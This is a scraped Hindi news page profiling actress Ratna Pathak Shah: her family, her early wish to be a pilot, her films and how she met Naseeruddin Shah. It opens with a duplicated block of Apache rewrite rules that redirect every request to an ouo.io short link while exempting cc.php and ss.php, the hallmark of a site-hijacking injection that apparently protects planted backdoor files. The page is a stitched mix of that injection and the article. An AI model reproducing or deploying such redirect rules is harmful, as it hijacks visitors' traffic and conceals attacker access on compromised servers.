
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 835
Previous Nextमुंंबई। बॉलीवुड की स्थापित अदाकाराओं में रत्ना पाठक का नाम किसी पहचान का मोहताज नहीं है। रत्ना पाठक ने अपने फिल्मी करियर में एक से बढ़कर यादगार रोल निभाए। वे हर रोल में फिट हो जाती हैं। फिर चाहें वे कॉमेडी किरदार हो या सीरियस रोल। हर विधा में रत्ना ने अपनी शानदार एक्टिंग की छाप छोड़ी है। हालांकि ये अलग बात है कि उन्हें अपनी प्रतिभा के मुताबिक बॉलीवुड में वो मुकाम कभी हासिल नहीं हो सका, जो उनकी एक्टिंग स्किल के आधार पर उन्हें मिलना चाहिए था। फिल्मी परिवार से ताल्लुक रखने वाली ये अभिनेत्री कभी सिने जगत का हिस्सा नहीं बनना चाहती थीं। वे तो पायलट और एयरहोस्टेस बनना चाहती थीं।
रत्ना पाठक शाह का जन्म मुंबई में हुआ। उनकी मां दीना पाठक एक जानी मानी नायिका थीं। उनकी बहन सुप्रिया पाठक भी बेहतरीन एक्ट्रेसेज में एक हैं। घर में ऐसा माहौल होने के बावजूद रत्ना अभिनेत्री नहीं बनना चाहती थीं। रत्ना ने एक इंटरव्यू में बताया था कि वे कभी भी अभिनेत्री नहीं बनना चाहती थीं। वे तो पायलट या एयरहोस्टेस बनना चाहती थीं। फिल्म मंडी, मिर्च मसाला, जाने तू या जाने न जाने, पहेली, एक मैं और एक तू, कपूर एंड सन्स, गोलमाल 3 और खूबसूरत जैसी यादगार फिल्में करने वाली रत्ना ने दिग्गज अभिनेता नसीरुद्दीन शाह से शादी की है। रत्ना और नसीर की लवस्टोरी भी किसी फिल्मी कहानी से कम नहीं हैं। दोनों की पहली मुलाक़ात जूस की दुकान पर हुई थी। रत्ना और नसीरुद्दीन दोनों थिएटर से जुड़े थे और दोनों ने साथ एक नाटक में काम किया। साथ काम करने के दौरान ही दोनों में दोस्ती हुई।